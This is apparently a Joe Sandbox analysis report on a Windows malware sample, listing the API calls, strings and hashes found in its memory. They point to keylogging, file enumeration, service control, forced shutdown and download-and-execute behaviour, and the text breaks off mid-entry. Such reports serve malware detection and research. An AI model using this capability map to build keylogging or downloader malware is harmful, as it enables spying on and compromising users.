                                • Instruction Fuzzy Hash: 74C26D71E046288FDB25CE28DD407EAB3B5EB45306F1441EBD80DE7252E778AE898F45
                                APIs
                                • __EH_prolog.LIBCMT ref: 00408393
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                • FindClose.KERNEL32(00000000), ref: 004086F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrow
                                • String ID:
                                • API String ID: 242384754-0
                                • Opcode ID: 44480e5af65fc277b0032a7779d8a5fca1e445452c2f644f1cfeefee86da47d8
                                • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                • Opcode Fuzzy Hash: 44480e5af65fc277b0032a7779d8a5fca1e445452c2f644f1cfeefee86da47d8
                                • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                APIs
                                • GetForegroundWindow.USER32 ref: 0040949C
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                • GetKeyState.USER32(00000010), ref: 004094B8
                                • GetKeyboardState.USER32(?), ref: 004094C5
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                • String ID:
                                • API String ID: 3566172867-0
                                • Opcode ID: fb31a49d7b713d020a20d08ecca38714848a3f936d0bc64d24338e42dde13448
                                • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                • Opcode Fuzzy Hash: fb31a49d7b713d020a20d08ecca38714848a3f936d0bc64d24338e42dde13448
                                • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 4a984d4e7a6e451d1891994230232e3494b40b2086f34394cb7f46f36756c8ae
                                • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                • Opcode Fuzzy Hash: 4a984d4e7a6e451d1891994230232e3494b40b2086f34394cb7f46f36756c8ae
                                • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: @8T$`'G$`'G
                                • API String ID: 341183262-3126820404
                                • Opcode ID: 8d751cc80bdca3fd2b46b50924137652240b5166e6d2558aa7bf39edfd0ff906
                                • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                • Opcode Fuzzy Hash: 8d751cc80bdca3fd2b46b50924137652240b5166e6d2558aa7bf39edfd0ff906
                                • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                APIs
                                  • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                  • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                  • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                  • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                  • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-1420736420
                                • Opcode ID: 08d91f060069d852ead358dd3820c496cb2f031836d8cba6e09d7269b4f00372
                                • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                • Opcode Fuzzy Hash: 08d91f060069d852ead358dd3820c496cb2f031836d8cba6e09d7269b4f00372
                                • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                APIs
                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0044F6B5
                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0044F6DE
                                • GetACP.KERNEL32 ref: 0044F6F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP
                                • API String ID: 2299586839-711371036
                                • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                APIs
                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                • wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(00000000,?,00000000,0040A156,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                • API String ID: 1497725170-248792730
                                • Opcode ID: 607dbe55d9de5a05f86858bbd51a554e82fa839201e0fe66911a909e2b53e973
                                • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                • Opcode Fuzzy Hash: 607dbe55d9de5a05f86858bbd51a554e82fa839201e0fe66911a909e2b53e973
                                • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                APIs
                                • __EH_prolog.LIBCMT ref: 004087A5
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: 484577a562c9f558e50b26f0dbc178e9d2885c96ec1e9cce47e72067aeb176cc
                                • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                • Opcode Fuzzy Hash: 484577a562c9f558e50b26f0dbc178e9d2885c96ec1e9cce47e72067aeb176cc
                                • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • GetUserDefaultLCID.KERNEL32 ref: 0044F8FC
                                • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0044F9CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID:
                                • API String ID: 745075371-0
                                • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                APIs
                                • __EH_prolog.LIBCMT ref: 0040784D
                                • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID:
                                • API String ID: 1771804793-0
                                • Opcode ID: 24543a1a10282cba8048a7387c3aa6f200ae2d1ca8a97a3849647739c1ea44b8
                                • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                • Opcode Fuzzy Hash: 24543a1a10282cba8048a7387c3aa6f200ae2d1ca8a97a3849647739c1ea44b8
                                • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A%E$A%E
                                • API String ID: 0-137320553
                                • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                                • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: C:\Users\user\Desktop\DB5rQYsfd6.exe$open
                                • API String ID: 2825088817-2294821366
                                • Opcode ID: 9279dac6bf6dd89e916ae4ad58f81462122a69ac66b806c492ba8f60ae407084
                                • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                • Opcode Fuzzy Hash: 9279dac6bf6dd89e916ae4ad58f81462122a69ac66b806c492ba8f60ae407084
                                • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                  • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                                  • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                                  • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: f596ae5af9bf33204b26619baa0d18e1563d856132adf7f8c82eb4cc627f6b2d
                                • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                • Opcode Fuzzy Hash: f596ae5af9bf33204b26619baa0d18e1563d856132adf7f8c82eb4cc627f6b2d
                                • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • IsValidCodePage.KERNEL32(00000000), ref: 0044EF9A
                                • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                • _wcschr.LIBVCRUNTIME ref: 0044F038
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0044F0DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                • String ID:
                                • API String ID: 4212172061-0
                                • Opcode ID: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
                                • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                • Opcode Fuzzy Hash: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
                                • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                APIs
                                • _free.LIBCMT ref: 004468EC
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • GetTimeZoneInformation.KERNEL32 ref: 004468FE
                                • WideCharToMultiByte.KERNEL32(00000000,?,0046F754,000000FF,?,0000003F,?,?), ref: 00446976
                                • WideCharToMultiByte.KERNEL32(00000000,?,0046F7A8,000000FF,?,0000003F,?,?,?,0046F754,000000FF,?,0000003F,?,?), ref: 004469A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                • String ID:
                                • API String ID: 806657224-0
                                • Opcode ID: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
                                • Instruction ID: 2b7d8a9ac893eb444b3138181a21c3719d458e34cf104297cae44ef8c21a1482
